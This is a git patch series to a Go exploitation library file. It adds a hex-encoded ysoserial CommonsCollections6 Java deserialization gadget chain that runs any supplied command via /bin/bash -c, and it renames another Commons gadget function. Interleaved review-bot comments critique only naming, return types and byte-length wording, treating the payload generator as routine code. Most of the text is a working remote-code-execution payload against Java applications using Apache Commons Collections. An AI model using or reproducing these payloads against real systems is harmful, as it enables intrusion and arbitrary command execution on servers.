From 1771318fea048e3c8b8c0670322b00a68aa5bd26 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem
Date: Wed, 19 Mar 2025 21:31:19 -0600
Subject: [PATCH 1/3] Added modified Commons6 payload and corrected the return type for Commons10
---
 java/javagadget.go | 132 +++++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 128 insertions(+), 4 deletions(-)
diff --git a/java/javagadget.go b/java/javagadget.go
index ccb5796..4275204 100644
--- a/java/javagadget.go
+++ b/java/javagadget.go
@@ -15,10 +15,134 @@ func ErrorInvalidCommandLength(msg string) error { return fmt.Errorf("%w: %s", errInvalidCommandLength, msg) } -// the allocated space (255). -func Commons11CommandBytecode(commandStr string) ([]byte, error) { +// to this function with -c or anything of the like. +func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) { if len(commandStr) > 255 || len(commandStr) < 1 { - return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters") + return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") + } + + payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" + + "\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" + + "\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" + + "\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" + + "\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" + + "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" + + "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" + + "\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" + + "\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" + + "\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" + + "\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" + + "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" + + "\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" + + "\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" + + "\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72" + + "\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" + + "\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c" + + "\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70" + + "\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82" + + "\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61" + + "\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67" + + "\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d" + + "\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69" + + "\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72" + + "\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72" + + 
"\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d" + + "\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74" + + "\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72" + + "\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61" + + "\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec" + + "\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74" + + "\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63" + + "\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63" + + "\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78" + + "\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61" + + "\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e" + + "\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" + + "\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" + + "\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00" + + "\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f" + + "\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f" + + "\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63" + + "\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f" + + "\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54" + + "\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76" + + "\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09" + + "\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e" + + "\x00\x03\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d" + + "\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70" + + "\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73" + + "\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73" + + "\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e" + + "\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f" + + "\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38" + + "\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74" + + "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" + + "\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b" + + 
"\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74" + + "\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + + "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69" + + "\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00" + + "\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + + "\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00" + + "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" + + "\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f" + + "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" + + "\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" + + "\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b" + + "\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78" + + "\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d" + + "\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1b\x00" + + "\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e" + + "\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0" + + "\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70" + + "\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x13" + + "\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x02\x70\x75" + + "\x71\x00\x7e\x00\x18\x00\x00\x00\x00\x74\x00\x06" + + "\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1b" + + "\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78" + + "\x70\x76\x71\x00\x7e\x00\x18\x73\x71\x00\x7e\x00" + + "\x13\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x01\x75" + + "\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61" + + "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2" + + "\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" + + "\x00\x00\x03\x74\x00\x09\x2f\x62\x69\x6e\x2f\x62" + + "\x61\x73\x68\x74\x00\x02\x2d\x63\x74\x00\xff" + + + // 255 characters were allocated, we just put back the unused + // length as spaces + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + + + "\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00" + + 
"\x7e\x00\x1b\x00\x00\x00\x01\x76\x71\x00\x7e\x00" + + "\x2c\x73\x71\x00\x7e\x00\x0f\x73\x72\x00\x11\x6a" + + "\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74" + + "\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38" + + "\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78" + + "\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" + + "\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b" + + "\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01" + + "\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69" + + "\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda" + + "\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c" + + "\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09" + + "\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f" + + "\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00" + + "\x10\x00\x00\x00\x00\x78\x78\x78" + + return payloadBytes, nil +} + +// Generated using ysoserial with CommonsCollections11. +func Commons11CommandBytecode(commandStr string) (string, error) { + if len(commandStr) > 255 || len(commandStr) < 1 { + return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters") } payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" + @@ -283,7 +407,7 @@ func Commons11CommandBytecode(commandStr string) ([]byte, error) { "\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" + "\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78" - return []byte(payloadBytes), nil + return payloadBytes, nil } // This is a serialized java reverse shell. The gadget was generated by ysoserial From a68b24ac551f9beb1f8febed7e48521478d1fe17 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Wed, 19 Mar 2025 21:40:01 -0600 Subject: [PATCH 2/3] Added more descriptive comment --- java/javagadget.go | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/java/javagadget.go b/java/javagadget.go index 4275204..b5bc14f 100644 --- a/java/javagadget.go +++ b/java/javagadget.go 
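Review bot: The length guard in the new `Commons6ModifiedBashCommandBytecode` and its error text disagree on units: `len(commandStr)` counts bytes, and the serialized length field emitted just before the command (`\x74\x00\xff`) together with the `strings.Repeat(" ", 0xff-len(commandStr))` padding are byte-based as well, while the message and the "255 characters" comment say characters, so a multibyte command is measured differently from what the comment promises. Suggest `ErrorInvalidCommandLength("command must be between 1 and 255 bytes")` and `// 255 bytes were allocated for the command; pad the unused length with spaces`. The padding also depends on `strings`; the import block is outside this hunk, so it was presumably already imported for the older padding code, but that is worth confirming before merging. The doc comment could also state that the returned string is a raw Java serialization stream (it starts with the `\xac\xed\x00\x05` header) so callers know not to re-encode or re-pad it.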
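Review bot: Changing the exported return type of `Commons11CommandBytecode` from `[]byte` to `string` (here and at the signature change earlier in this patch) is a source-incompatible change for any importer that handed the result to a `[]byte` API, and the patch carries no migration note. If compatibility matters, keep the old name as a thin wrapper that does `s, err := Commons11CommandBytecode(commandStr); return []byte(s), err`, or at least say in the commit message that callers must now convert. The body of the function lies outside this hunk.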
@@ -15,7 +15,12 @@ func ErrorInvalidCommandLength(msg string) error {
 return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
 }
 
-// to this function with -c or anything of the like.
+// This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg
+// The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to
+// prepend it with a bash -c, and the spaces do not need to be replaced with $IFS.
+// It also solves redirection issues that are present in unmodified ysoserial payloads.
+// This payload will always run the provided command using bash, hence the name.
+// That said you should not need, nor should you prepend a -c to commandStr parameter passed here.
 func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) {
 if len(commandStr) > 255 || len(commandStr) < 1 {
 return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
From 7f190e2a53bb0bb2379eff600a2c066e8779ea1e Mon Sep 17 00:00:00 2001
From: lobsterjerusalem
Date: Wed, 19 Mar 2025 21:56:41 -0600
Subject: [PATCH 3/3] one last correction to old func
---
 java/javagadget.go | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/java/javagadget.go b/java/javagadget.go
index b5bc14f..36df187 100644
--- a/java/javagadget.go
+++ b/java/javagadget.go
@@ -144,8 +144,8 @@ func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) {
 return payloadBytes, nil
 }
 
-// Generated using ysoserial with CommonsCollections11.
-func Commons11CommandBytecode(commandStr string) (string, error) {
+// Generated using ysoserial with CommonsCollections10
+func Commons10CommandBytecode(commandStr string) (string, error) {
 if len(commandStr) > 255 || len(commandStr) < 1 {
 return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
 }
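Review bot: The new six-line doc comment on `Commons6ModifiedBashCommandBytecode` does not start with the function name, which is what godoc and linters expect for an exported identifier, and its second line has a typo ("is the you do not need to"). Suggest opening with `// Commons6ModifiedBashCommandBytecode returns a serialized CommonsCollections6 payload (generated with ysoserial-modified) that runs commandStr via bash.` followed by `// Unlike an unmodified ysoserial payload, commandStr needs no "bash -c" prefix and its spaces need not be replaced with $IFS.`, keeping the redirection sentence as is. The last line ("That said you should not need, nor should you prepend a -c ...") repeats the prefix advice and could be dropped. The function body continues outside the hunk.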
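Review bot: Renaming the exported `Commons11CommandBytecode` to `Commons10CommandBytecode` drops a public identifier without a deprecated alias, so any importer of the old name stops compiling; a wrapper carrying `// Deprecated: use Commons10CommandBytecode.` would keep them building while the fix lands. The corrected comment also lost its terminating period and still does not start with the function name; suggest `// Commons10CommandBytecode returns a payload generated using ysoserial with CommonsCollections10.`. The function body continues outside the hunk.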